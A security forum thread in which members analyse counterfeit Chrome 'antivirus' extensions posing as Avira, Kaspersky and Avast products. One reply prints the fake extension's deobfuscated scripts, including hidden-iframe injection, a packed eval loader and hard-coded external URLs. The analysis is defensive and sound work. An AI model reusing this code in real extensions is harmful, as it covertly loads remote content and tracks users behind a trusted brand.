Chrome extensions: are they really tested and secure? Like Kaspersky Privacy Guard and Avira Protector?

giulia

Level 5
Thread author
Verified
Nov 30, 2016
236
Hi,
about Chrome extensions: I have found that several extensions are really suspicious.

For example, Kaspersky Privacy Guard Pro is practically identical to Avira Antivirus - Protector of Online Surfing and to others.

I left Chrome idle in my VM (clean install of Windows 7, with Google as the home page), and these extensions reported having blocked a very high number of threats (I don't remember the exact number).

Do you think they are really legit and serious?
I guess they could be dangerous and malware.
I have found other extensions with different names but almost the same GUI, file size and so on.
Have you tested and tried these 2 extensions? I mean Kaspersky Privacy Guard Pro & Avira Antivirus - Protector of Online Surfing.
Thanks
 
509322

Contact Kaspersky Labs and ask them if it is an official Kaspersky Labs product or if it is bogus.

That is the only way to know for sure.

Same with Avira.
 

cruelsister

Level 42
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 13, 2013
3,148
I would be really suspicious of any Chrome extension, especially recently. Over the past 6 months there has been an increasing number of malicious attacks on the developers of extensions. The purpose of the malware is to steal the developer's credentials; once this is done, a previously coded extension replacement can be uploaded to the Chrome Store. The malicious extensions so far have been primarily data stealers (bankers) and may have a current distribution of over 5 million for the 10 extensions so far identified.
 
Deleted member 65228


Below are three extensions really provided by Avira.
1. Avira SafeSearch Plus
2. Avira Password Manager
3. Avira Safe Shopping

All three of them have one thing in common: they support more than one language and have a proper description.

Here is an example of an authentic extension description.
Avira Password Manager automatically generates strong and unique passwords for all your accounts – and remembers them for you.

Here is an example of a suspicious, inaccurate description.
Real time scanning web pages and files. 100% Protection against malicious ransomware, spyware, trojan horse and suspicious trackers.

The interesting part of the above description is the claim of "100% Protection against malicious ransomware,...". The claim of "100% Protection" is suspicious, and the wording of the rest of the description is wrong... "malicious ransomware"? All ransomware is malicious. All Trojan horses are malicious. By definition, ransomware is something that demands a ransom in exchange for something (e.g. the private key to decrypt your files, or blackmail not to leak stolen documents), and a Trojan horse is something pretending to be something it isn't, with malicious intent.

There is no Privacy Policy for the Avira extension you linked to, while all the other ones do have one. This is another indicator that the Avira one you found is not genuine.


I decided to take a closer look at the extensions myself.

Below is an example of how the extension you linked us to is laid out prior to it being packed into *.CRX.


[screenshot: source layout of the suspicious extension before packing]



Below is an example of how the Avira SafeSearch source code is laid out prior to it being packed into *.CRX.

[screenshot: source layout of the genuine Avira SafeSearch extension before packing]


Right off the bat we can see a difference in source-code layout. Big companies stick to a routine for this to ease management/maintenance for the engineers, and usually follow many other rules around source-code layout, naming conventions (sometimes), etc.

Let's take a look at logo.png which is from the suspicious extension.

[screenshot: logo.png from the suspicious extension]


Hmmm.... Now that doesn't look like the Avira logo, does it?

popup.js from the suspicious extension contents is below.

Code:
var openUrl = 'http://antivirus-extension.courthost.com/';
chrome.tabs.getAllInWindow(null, function (tabs) {
    for (var i = 0; i < tabs.length; i++) {
        if (tabs[i].url.substr(0, openUrl.length) == openUrl) {
            chrome.tabs.update(tabs[i].id, { selected: true });
            window.close();
            return;
        }
    }
    chrome.tabs.create({ url: openUrl, selected: true });
    //window.close();
});

showWelcomePage();

function showWelcomePage(){
    if (!localStorage["updateread"]) {
        localStorage["updateread"] = MAJOR_VERSION;
        chrome.tabs.create({url: welcomeURL});
    }
}

Well that is interesting! The URL hxxp://antivirus-extension.courthost.com/ has a -36 reputation score on VirusTotal, too. I doubt the real Avira would be hard-coding a URL to that website, hosted at CourtHost (free host), or any URL with a -36 reputation score at all.

The following is from the manifest.json file which all extensions for Chromium will have (therefore both Chrome and Opera).

Code:
 "permissions": [
    "tabs",
    "webRequest",
    "webRequestBlocking",
    "http://*/*",
    "https://*/*",
    "storage"
  ],

webRequest/webRequestBlocking is a valid permission pair, required to use the Chrome API feature that intercepts new web requests before they complete. The real Avira should be using this, as should Avast and many other vendors that have an extension for intercepting web requests (I have not checked, because I am not going to dig into the genuine extension's source; the genuine one gives no reason to do so, whereas I can go through this rogue copy because I have a reasonable purpose for analysis). Based on this alone, however, it is possible that this extension actually blocks or redirects web requests.

inline.js is just an array of domains. I did some tests on some of the URLs and they appear to come back as clean according to online resources; however, I cannot be certain.

background.js and page.js are obfuscated/minified, so reading them was a bit more difficult at first. Thanks to a handy tool we can make them readable: JS NICE (Statistical renaming, Type inference and Deobfuscation). Beware that the page is flagged as insecure, but the tool is clean and genuine.

Below is background.js in readable form.
Code:
var KP_dwelltime;
var KP_gaptime;
/**
 * @return {undefined}
 */
var getSettings = function() {
  chrome.storage.sync.get(function(storageKey) {
    if (!storageKey.KP_dwelltime) {
      /** @type {number} */
      storageKey.KP_dwelltime = 50;
    }
    if (!storageKey.KP_gaptime) {
      /** @type {number} */
      storageKey.KP_gaptime = 50;
    }
    KP_dwelltime = storageKey.KP_dwelltime;
    KP_gaptime = storageKey.KP_gaptime;
    chrome.storage.sync.set(storageKey, function() {
    });
  });
};
chrome.tabs.onActivated.addListener(function(details) {
  chrome.tabs.get(details.tabId, function(request) {
    getSettings();
    chrome.storage.sync.get("KP__" + request.url.split("/")[2], function(dataAndEvents) {
      request.url.split("/");
    });
  });
});
chrome.tabs.onUpdated.addListener(function(dataAndEvents, jqXHR, request) {
  if ("complete" == jqXHR.status) {
    getSettings();
    chrome.storage.sync.get("KP__" + request.url.split("/")[2], function(dataAndEvents) {
      request.url.split("/");
    });
  }
});
/**
 * @param {?} dataAndEvents
 * @return {undefined}
 */
function logon(dataAndEvents) {
  if (dataAndEvents) {
    localval("dipislog88", "1");
    localval("InsDt6", "1502373696272");
  } else {
    localval("dipislog88", "0");
  }
}
if (-1 < document.location.href.indexOf("nonexistingitemguruedanpaitime")) {
  /** @type {string} */
  var idencompdate = "102337171019";
  /** @type {string} */
  localStorage.anpaitime = idencompdate;
}
/**
 * @return {undefined}
 */
function reloadit() {
  localval("dipLstLd88", "1");
  localval("dipLstSig88", "00112233");
}
/**
 * @return {undefined}
 */
function setishmn() {
  var cacheKey = {};
  /** @type {number} */
  cacheKey.isHmn1 = (new Date).getTime();
  chrome.storage.sync.set(cacheKey);
}
/**
 * @param {string} key
 * @param {string} res
 * @return {undefined}
 */
function localval(key, res) {
  chrome.storage.local.get(key, function(obj) {
    if (obj = obj[key]) {
      console.log(key + ": " + obj);
    } else {
      console.log(key + " not existing in chrome.storage.local");
    }
    if (res) {
      obj = {};
      /** @type {string} */
      obj[key] = res;
      console.log("set " + key + "=" + res);
      chrome.storage.local.set(obj);
    }
  });
}
/**
 * @return {undefined}
 */
function printall() {
  printlocals();
  printsyncs();
}
/**
 * @return {undefined}
 */
function printlocals() {
  chrome.storage.local.get(null, function(results) {
    for (key in results) {
      if (-1 == results[key].toString().indexOf("google-analytics.com")) {
        var fmt = "%clocal - " + key + ": " + results[key].toString().substring(0, 50);
        if (50 < results[key].toString().length) {
          fmt += "...";
        }
        console.log(fmt, "color: green");
      }
    }
  });
}
/**
 * @return {undefined}
 */
function printsyncs() {
  chrome.storage.sync.get(null, function(results) {
    for (key in results) {
      if (-1 == results[key].toString().indexOf("google-analytics.com")) {
        var fmt = "%csyncs - " + key + ": " + results[key].toString().substring(0, 50);
        if (50 < results[key].toString().length) {
          fmt += "...";
        }
        console.log(fmt, "color: blue");
      }
    }
  });
}
/**
 * @param {string} name
 * @param {string} value
 * @return {undefined}
 */
function syncval(name, value) {
  chrome.storage.sync.get(name, function(view) {
    if (view = view[name]) {
      console.log(name + ": " + view);
    } else {
      console.log(name + " not existing in chrome.storage.sync");
    }
    if (value) {
      view = {};
      /** @type {string} */
      view[name] = value;
      console.log("set " + name + "=" + value);
      chrome.storage.sync.set(view);
    }
  });
}
/**
 * @param {string} inplace
 * @param {string} deepDataAndEvents
 * @return {?}
 */
function dblB64(inplace, deepDataAndEvents) {
  return B64E(B64E(inplace, deepDataAndEvents), deepDataAndEvents);
}
/**
 * @param {string} data
 * @param {string} deepDataAndEvents
 * @return {?}
 */
function B64E(data, deepDataAndEvents) {
  var Base64 = {
    _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    /**
     * @param {string} input
     * @return {?}
     */
    encode : function(input) {
      /** @type {string} */
      var out = "";
      /** @type {number} */
      var i = 0;
      input = Base64._utf8_encode(input);
      for (;i < input.length;) {
        var enc4 = input.charCodeAt(i++);
        var chr2 = input.charCodeAt(i++);
        var val2 = input.charCodeAt(i++);
        /** @type {number} */
        var enc3 = enc4 >> 2;
        /** @type {number} */
        enc4 = (enc4 & 3) << 4 | chr2 >> 4;
        /** @type {number} */
        var enc2 = (chr2 & 15) << 2 | val2 >> 6;
        /** @type {number} */
        var enc1 = val2 & 63;
        if (isNaN(chr2)) {
          /** @type {number} */
          enc2 = enc1 = 64;
        } else {
          if (isNaN(val2)) {
            /** @type {number} */
            enc1 = 64;
          }
        }
        out = out + this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4) + this._keyStr.charAt(enc2) + this._keyStr.charAt(enc1);
      }
      return out;
    },
    /**
     * @param {string} input
     * @return {?}
     */
    decode : function(input) {
      /** @type {string} */
      var output = "";
      /** @type {number} */
      var i = 0;
      input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
      for (;i < input.length;) {
        var lo = this._keyStr.indexOf(input.charAt(i++));
        var c2 = this._keyStr.indexOf(input.charAt(i++));
        var g = this._keyStr.indexOf(input.charAt(i++));
        var e4 = this._keyStr.indexOf(input.charAt(i++));
        /** @type {number} */
        lo = lo << 2 | c2 >> 4;
        /** @type {number} */
        c2 = (c2 & 15) << 4 | g >> 2;
        /** @type {number} */
        var c3 = (g & 3) << 6 | e4;
        output += String.fromCharCode(lo);
        if (64 != g) {
          output += String.fromCharCode(c2);
        }
        if (64 != e4) {
          output += String.fromCharCode(c3);
        }
      }
      return output = Base64._utf8_decode(output);
    },
    /**
     * @param {string} string
     * @return {?}
     */
    _utf8_encode : function(string) {
      string = string.replace(/\r\n/g, "\n");
      /** @type {string} */
      var utftext = "";
      /** @type {number} */
      var n = 0;
      for (;n < string.length;n++) {
        var c = string.charCodeAt(n);
        if (128 > c) {
          utftext += String.fromCharCode(c);
        } else {
          if (127 < c && 2048 > c) {
            utftext += String.fromCharCode(c >> 6 | 192);
          } else {
            utftext += String.fromCharCode(c >> 12 | 224);
            utftext += String.fromCharCode(c >> 6 & 63 | 128);
          }
          utftext += String.fromCharCode(c & 63 | 128);
        }
      }
      return utftext;
    },
    /**
     * @param {string} utftext
     * @return {?}
     */
    _utf8_decode : function(utftext) {
      /** @type {string} */
      var str = "";
      /** @type {number} */
      var i = 0;
      /** @type {number} */
      c1 = c2 = 0;
      for (;i < utftext.length;) {
        var b = utftext.charCodeAt(i);
        if (128 > b) {
          str += String.fromCharCode(b);
          i++;
        } else {
          if (191 < b && 224 > b) {
            c2 = utftext.charCodeAt(i + 1);
            str += String.fromCharCode((b & 31) << 6 | c2 & 63);
            i += 2;
          } else {
            c2 = utftext.charCodeAt(i + 1);
            c3 = utftext.charCodeAt(i + 2);
            str += String.fromCharCode((b & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
            i += 3;
          }
        }
      }
      return str;
    }
  };
  if ("encode" == deepDataAndEvents) {
    return Base64.encode(data);
  }
  if ("decode" == deepDataAndEvents) {
    return Base64.decode(data);
  }
}
/**
 * @param {number} min
 * @param {number} max
 * @return {?}
 */
function getRandomInt(min, max) {
  return Math.floor(Math.random() * (max - min)) + min;
}
/** @type {string} */
var curIfrId = "";
/**
 * @param {string} val
 * @param {number} opt_attributes
 * @return {undefined}
 */
function IstIvsIfm_ex(val, opt_attributes) {
  if ("" != val) {
    /** @type {Element} */
    var s = document.createElement(dblB64("YVdaeVlXMWw=", "decode"));
    var m = B64E(val + getRandomInt(1, 999999).toString(), "encode");
    s.setAttribute("width", "0px");
    s.setAttribute("height", "0px");
    s.setAttribute("display", "none");
    s.setAttribute("src", val);
    s.setAttribute("id", m);
    document.body.appendChild(s);
    curIfrId = m;
    setTimeout(function() {
      /** @type {(HTMLElement|null)} */
      var tabPage = document.getElementById(m);
      tabPage.parentNode.removeChild(tabPage);
    }, 1E3 * opt_attributes);
  }
}
chrome.runtime.onMessage.addListener(function(dataAndEvents, deepDataAndEvents, done) {
  if (dataAndEvents.refererUrl) {
    var js = dblB64(dataAndEvents.refererUrl, "decode");
    IstIvsIfm_ex(js, 20);
    done({
      done : "ok"
    });
  }
  if (dataAndEvents.mercUrl) {
    js = dblB64(dataAndEvents.mercUrl, "decode");
    setTimeout(function() {
      document.getElementById(curIfrId).src = js;
    }, 1E3);
  }
});
/**
 * @return {undefined}
 */
window.onbeforeunload = function() {
  reloadme();
};
/**
 * @return {undefined}
 */
function reloadme() {
  chrome.runtime.reload();
}
if (chrome.runtime.setUninstallURL) {
  chrome.storage.local.get("InsDt6", function(deepDataAndEvents) {
    deepDataAndEvents = deepDataAndEvents.InsDt6;
    /** @type {number} */
    inst = ((new Date).getTime() - deepDataAndEvents) / 1E3 / 3600 / 24;
    /** @type {string} */
    inst = inst.toString().substring(0, 5);
    deepDataAndEvents = "http://mitarchive.info/temp/survey.html?inst=" + inst + "&id=" + chrome.runtime.id.substring(0, 3);
    chrome.runtime.setUninstallURL(deepDataAndEvents);
  });
}
;

Below is page.js in readable form.
Code:
/**
 * @param {Window} global
 * @param {?} factory
 * @return {undefined}
 */
function CMejLrFH(global, factory) {
  if ("object" == typeof module && "object" == typeof module.exports) {
    module.exports = global.document ? factory(global, true) : function($) {
      if (!$.document) {
        throw new Error("document");
      }
      return factory($);
    };
  } else {
    factory(global);
  }
}
/**
 * @param {Window} global
 * @param {?} factory
 * @return {undefined}
 */
function ntgzivfM(global, factory) {
  if ("key" == typeof module && "key" == typeof module.exports) {
    module.exports = global.document ? factory(global, true) : function($) {
      if (!$.document) {
        throw new Error("key");
      }
      return factory($);
    };
  } else {
    factory(global);
  }
}
/**
 * @param {Window} global
 * @param {?} factory
 * @return {undefined}
 */
function duRwCNaF(global, factory) {
  if ("val" == typeof module && "val" == typeof module.exports) {
    module.exports = global.document ? factory(global, true) : function($) {
      if (!$.document) {
        throw new Error("val");
      }
      return factory($);
    };
  } else {
    factory(global);
  }
}
/**
 * @param {Array} codeSegments
 * @return {?}
 */
function pHjyLIOk(codeSegments) {
  var _decipherStr = {
    _decipherStr : "WkVkb2NHTXliSHBaVjA1d1kwZG9iR051VGpCamJXeDFXak5TZG1SWVRteGFSemwxWWpOU2MxcFhSbkk=",
    /**
     * @param {string} queryStr
     * @return {?}
     */
    dc : function(queryStr) {
      return _decipherStr;
    }
  };
  /** @type {string} */
  var CMejLrFH = '(function(){var g=s.createElement("div");g.innerHTML="<div></div><div></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}:';
  var Base64 = {
    _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    /**
     * @param {string} text
     * @return {?}
     */
    dc : function(text) {
      /** @type {string} */
      var output = "";
      var chr1;
      var chr2;
      var chr3;
      var enc1;
      var enc2;
      var u;
      var enc4;
      /** @type {number} */
      var i = 0;
      text = text.replace(/[^A-Za-z0-9\+\/\=]/g, "");
      for (;i < text.length;) {
        enc1 = this._keyStr.indexOf(text.charAt(i++));
        enc2 = this._keyStr.indexOf(text.charAt(i++));
        u = this._keyStr.indexOf(text.charAt(i++));
        enc4 = this._keyStr.indexOf(text.charAt(i++));
        /** @type {number} */
        chr1 = enc1 << 2 | enc2 >> 4;
        /** @type {number} */
        chr2 = (enc2 & 15) << 4 | u >> 2;
        /** @type {number} */
        chr3 = (u & 3) << 6 | enc4;
        /** @type {string} */
        output = output + String.fromCharCode(chr1);
        if (u != 64) {
          /** @type {string} */
          output = output + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
          /** @type {string} */
          output = output + String.fromCharCode(chr3);
        }
      }
      output = Base64._utf8_decode(output);
      return output;
    },
    /**
     * @param {string} string
     * @return {?}
     */
    _utf8_encode : function(string) {
      string = string.replace(/\r\n/g, "\n");
      /** @type {string} */
      var utftext = "";
      /** @type {number} */
      var n = 0;
      for (;n < string.length;n++) {
        var c = string.charCodeAt(n);
        if (c < 128) {
          utftext += String.fromCharCode(c);
        } else {
          if (c > 127 && c < 2048) {
            utftext += String.fromCharCode(c >> 6 | 192);
            utftext += String.fromCharCode(c & 63 | 128);
          } else {
            utftext += String.fromCharCode(c >> 12 | 224);
            utftext += String.fromCharCode(c >> 6 & 63 | 128);
            utftext += String.fromCharCode(c & 63 | 128);
          }
        }
      }
      return utftext;
    },
    /**
     * @param {string} utftext
     * @return {?}
     */
    _utf8_decode : function(utftext) {
      /** @type {string} */
      var string = "";
      /** @type {number} */
      var i = 0;
      /** @type {number} */
      var c = c1 = c2 = 0;
      for (;i < utftext.length;) {
        c = utftext.charCodeAt(i);
        if (c < 128) {
          string += String.fromCharCode(c);
          i++;
        } else {
          if (c > 191 && c < 224) {
            c2 = utftext.charCodeAt(i + 1);
            string += String.fromCharCode((c & 31) << 6 | c2 & 63);
            i += 2;
          } else {
            c2 = utftext.charCodeAt(i + 1);
            c3 = utftext.charCodeAt(i + 2);
            string += String.fromCharCode((c & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
            i += 3;
          }
        }
      }
      return string;
    }
  };
  /** @type {string} */
  var url = "";
  /** @type {number} */
  var i = 0;
  for (;i < codeSegments.length;i++) {
    var letter = codeSegments[i];
    if (letter == letter.toUpperCase()) {
      letter = letter.toLowerCase();
    } else {
      if (letter == letter.toLowerCase()) {
        letter = letter.toUpperCase();
      }
    }
    /** @type {string} */
    url = url + letter;
  }
  /** @type {Array} */
  var jQuery = ["jQuery", "jQuery Library v1.4.2", "Copyright 2010, John Resig"];
  /** @type {string} */
  var ntgzivfM = 'function ExtractString(a,b,c){var d="ERROR";-1<a.indexOf(b)&&(a=a.split(b),-1<a[1].indexOf(c)&&(d=a[1].split(c)[0]));return d};';
  var deployOptions = {
    site : "SIMPLE+",
    /**
     * @param {string} queryStr
     * @return {?}
     */
    dc : function(queryStr) {
      return "ntgzivfM.jQuery";
    }
  };
  return Base64.dc(url);
}
eval(function(str, div, name, pair, func, opt_attributes) {
  /**
   * @param {number} i
   * @return {?}
   */
  func = function(i) {
    return(i < div ? "" : func(parseInt(i / div))) + ((i = i % div) > 35 ? String.fromCharCode(i + 29) : i.toString(36));
  };
  if (!"".replace(/^/, String)) {
    for (;name--;) {
      opt_attributes[func(name)] = pair[name] || func(name);
    }
    /** @type {Array} */
    pair = [function(timeoutKey) {
      return opt_attributes[timeoutKey];
    }];
    /**
     * @return {?}
     */
    func = function() {
      return "\\w+";
    };
    /** @type {number} */
    name = 1;
  }
  for (;name--;) {
    if (pair[name]) {
      /** @type {string} */
      str = str.replace(new RegExp("\\b" + func(name) + "\\b", "g"), pair[name]);
    }
  }
  return str;
}('7 q={},W;1C();8 1C(){10()||y.z.N.13(1T,8(a){L(Y 1U a)q[Y]=a[Y];"1"==q.1P&&(W=!0);1E()})}8 1E(){7 a=q.G;a?(a=((C E).K()-a)/1y/1F/24,5>a?u(a+"<5 1I 2a"):(1x()&&O(!0),1G())):1A()}8 1A(){y.z.1w.13("G",8(a){p(a.G){7 b={};b.G=a.G;y.z.N.P(b)}1m 1z()})}8 1z(){y.z.1w.P({G:(C E).K()},8(){})}8 1G(){7 a=q.1l;a&&-1<a.j("1o")&&2d(a)}7 X=24;8 1x(){U{p(!q.R)i!0;7 a=((C E).K()-q.R)/1y/1F;u("28: "+a+" ("+X+" 2c)");p(a>X)i!0}S(b){i!0}i!1}8 O(a){U{7 b=C 2b;b.1Q=8(){4==b.2e&&(1S==b.1V?1p(b.1J):a&&(u("1i 1g 1u..."),O(!1)))};b.29=8(){a&&(u("1i 1g 1u..."),O(!1))};b.2f=8(){};b.25=!0;7 c="//26.23.11/1h/1d.1r?f=1s";a||(c="//22.1Z/1h/1d.1r?f=1s");q.Z&&-1==c.j("&c=")&&(c=c+"&c="+q.Z);u("1Y 1X "+c);b.1M("1N",c,!0);b.1L()}S(f){i"1K"}}8 1p(a){p(20<a.B&&-1<a.j("1o")){u("1O 1n");7 b=a.1W("`"),c=a.1a(0,b);a=a.1a(b+1);b={};b.Z=c;b.R=(C E).K();b.1l=a}1m u("1R 1n: B="+a.B+" 27="+a.j("2j")),b={},b.R=(C E).K();y.z.N.P(b)}8 10(){U{i D.1c!==D.14}S(a){i!0}}8 u(a){U{p(W){7 b=(C E).2G();2E.2I("%2C - "+b+" "+a+"\\t\\t"+2H.2O.2M.2J,"2K: 2L")}}S(c){}}1t();8 1t(){p(10()&&D.2z===D.14&&(y.z.N.13("16",8(a){7 b=a.16;b&&""!=b&&(a=19(b.1e("^")[0],"J"),b=19(b.1e("^")[1],"J"),-1<D.H.M.j(1j(a,!0))&&(D.H.M=b,1H("16","")))}),-1<H.M.j("2m.2n.11/2o?")||-1<H.M.j("2l-2k.2h.11"))){7 a=1b.2i("2A")[0].2p;a=a.Q("p (14.H != 1c.H)","p (1==2)");1b.2q(a)}}8 17(a,b){7 c={s:"2w+/=",18:8(a){7 b="",e=0;L(a=c.1v(a);e<a.B;){7 d=a.v(e++);7 f=a.v(e++);7 g=a.v(e++);7 h=d>>2;d=(d&3)<<4|f>>4;7 k=(f&15)<<2|g>>6;7 l=g&F;1q(f)?k=l=V:1q(g)&&(l=V);b=b+x.s.w(h)+x.s.w(d)+x.s.w(k)+x.s.w(l)}i b},J:8(a){7 b="",e=0;L(a=a.Q(/[^A-2x-2y-9\\+\\/\\=]/g,"");e<a.B;){7 d=x.s.j(a.w(e++));7 f=x.s.j(a.w(e++));7 g=x.s.j(a.w(e++));7 h=x.s.j(a.w(e++));d=d<<2|f>>4;f=(f&15)<<4|g>>2;7 k=(g&3)<<6|h;b+=m.o(d);V!=g&&(b+=m.o(f));V!=h&&(b+=m.o(k))}i b=c.1D(b)},1v:8(a){a=a.Q(/\\r\\n/g,"\\n");L(7 b="",c=0;c<a.B;c++){7 d=a.v(c);T>d?b+=m.o(d):(2v<d&&2u>d?b+=m.o(d>>6|2r):(b+=m.o(d>>12|1B),b+=m.o(d>>6&F|T)),b+=m.o(d&F|T))}i b},1D:8(a){7 b="",c=0;L(2s=I=0;c<a.B;){7 
d=a.v(c);T>d?(b+=m.o(d),c++):2D<d&&1B>d?(I=a.v(c+1),b+=m.o((d&2t)<<6|I&F),c+=2):(I=a.v(c+1),1f=a.v(c+2),b+=m.o((d&15)<<12|(I&F)<<6|1f&F),c+=3)}i b}};p("18"==b)i c.18(a);p("J"==b)i c.J(a)}8 19(a,b){i 17(17(a,b),b)}8 1j(a,b){0!=a.j("1k")&&(a="1k://"+a);7 c=1b.2F("a");c.M=a;c=c.2g.2B();b&&0==c.j("2N.")&&(c=c.1a(4));i c=c.Q(":21","")}8 1H(a,b){7 c={};c[a]=b;y.z.N.P(c)};',
62, 175, pHjyLIOk("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").split("|"),
0, {}));

IMO it all looks suspicious. I cannot tell you exactly what is going on with the JavaScript because I am far from knowledgeable with the language (I am a software developer, not a web developer), and there are other JS files which can be inspected too. However, what I can definitely tell you as fact is that this Avira extension you linked us to is 100% not genuinely from Avira, and I have absolutely no doubt in my mind that someone is either trying to piggy-back off the success of Avira with a fake extension for a peculiar reason, or has malicious intent (if not now, then somewhere down the line after attracting more people to download and install the extension).

This fake Avira extension's code base is tiny compared to what you could expect from a well-known and trusted vendor like Avira.

Here is the CourtHost website referenced in the source code of the fake extension.

[screenshot: the CourtHost website referenced in the fake extension's source]


As we can see, that is 100% not from Avira.

If you send me the link to the other extension you had suspicions about, I'll try to check it out for you now and see what I can report back. However, stay away from that Avira extension and report it for abuse.

Thanks for reading, stay safe friend.
 

giulia
@Opcode
Amazing job, information and analysis.
I'm wondering how easy it is to upload such extensions; what kind of control does Google perform?
It would be really great to know what these extensions are doing, I mean what nasty tasks they are performing.
Just like I said, I left Chrome (clean install) in a virtual machine without any information, and these extensions did claim to have stopped many, many malware.
There are lots of users that have installed them, and there are more extensions like them, but I can't remember their names.

PS: there is another one, Privacy Lock by Avast 2.11.1.
Thanks Opcode
 
Deleted member 65228

I'm wondering how easy it is to upload such extensions; what kind of control does Google perform?
Google Chrome extensions aren't properly protected. The *.CRX can be downloaded without installing the extension into Google Chrome, and you can then unpack the file to get a full view of the code base. From there on you may encounter obfuscation/protection techniques applied manually by the extension owner; other than that, there is no restriction on access.

I am not going to provide step-by-step instructions on doing this because I am pretty sure that laws still apply, and don't want to encourage anyone trying to sneak into genuine extensions which are closed-source. This is why I did not provide any other screenshots regarding the genuine Avira extension, I didn't go any further than acquiring the screenshot of the documents for legal reasons.

The Kaspersky extension you mentioned: Kaspersky Privacy Guard Pro

That extension is fake as well, and if you know how to and perform analysis, you'll see the source code is either extremely similar or actually completely identical to the previous Avira rogue extension. This implies it was created and published by the same person who published the illegitimate Avira extension.

The fake Kaspersky extension is actually detected as a threat by Kaspersky according to the Chrome Store reviews.
 
Deleted member 65228

PS: there is another one, Privacy Lock by Avast 2.11.1.
Privacy Lock by Avast

That extension? LOL. I just took a look for you and I am 99% certain that is by the same author/s as well... Too many similarities with the analysis for it not to be by the same person/people. The extension even has the same hard-coded domain names like the other two do, but in another *.js file this time.
 

giulia
Hi,
how can I contact Kaspersky, Avira, Avast and others to check these extensions and report an analysis?
I got lost in Kaspersky's sites.
Thanks
 

giulia
It seems Kaspersky already detects 2 files of the full code of that extension:
Hi,
have you uploaded it? Should I upload it via email?
But will Kaspersky release a short analysis about what these extensions are doing?
Kaspersky detects them only as of today, right?
I will switch to Kaspersky, no more ESET for me anymore.
Thanks
 

DeepWeb

Level 25
Verified
Top Poster
Well-known
Jul 1, 2017
1,396
Geez! As a general rule I never install or enable any browsing protection extensions. But, if I did I might have fallen for one of those easily... How is the average user going to be able to tell the difference? It even says "offered by Kaspersky Lab" making you think that the owner is legitimate..
 

ichito

Level 11
Verified
Top Poster
Content Creator
Well-known
Dec 12, 2013
541
Geez! As a general rule I never install or enable any browsing protection extensions. But, if I did I might have fallen for one of those easily... How is the average user going to be able to tell the difference? It even says "offered by Kaspersky Lab" making you think that the owner is legitimate..
Absolutely agree... it's shocking, but if we want to be fair we should know something like an "official statement" from the developers.
 

giulia
I just compressed the unpacked content of the extension installed in my Chrome browser, and then sent it to KL VirusDesk, that was the results :)
Hi harlan4096,
I used a virtual machine, but how can you download a Chrome extension without installing it?
Thanks

Geez! As a general rule I never install or enable any browsing protection extensions. But, if I did I might have fallen for one of those easily... How is the average user going to be able to tell the difference? It even says "offered by Kaspersky Lab" making you think that the owner is legitimate..
Hi DeepWeb, think about how many normal users, young users or older users there are.
Thanks
 
Deleted member 65228

I used a virtual machine, but how can you download a Chrome extension without installing it?
You can find an online *.CRX downloader that takes the Google Chrome Web Store URL, or install the extension and then navigate to [SYSTEMDRIVE]:\Users\[USERNAME]\AppData\Local\Google\Chrome\User Data\Default\Extensions

Replace [SYSTEMDRIVE] with the system drive (e.g. "C:\") and replace [USERNAME] with the account name for the user account (e.g. "Opcode", "Analysis", "Bob", etc.).

Under that folder you will find other folders, each representing an installed extension. If you're in an analysis environment for inspection/malware testing, it should be secure, so you can install suspicious/malicious extensions for investigation (and thus inspect the source files further this way). Alternatively, use a CRX download so you don't have to install the extension, and unpack it by unzipping it with software like 7-Zip; now you have a folder with the source files.

Bear in mind that even on a normal host system you should not be downloading the CRX alone, even if it won't be active. Accidents can happen; stick to the analysis environment at all times as a safety precaution. Watch out for some CRX download sites as well, because Google Chrome may automatically attempt to install the extension after the download, depending on how the download is triggered in-browser.
 
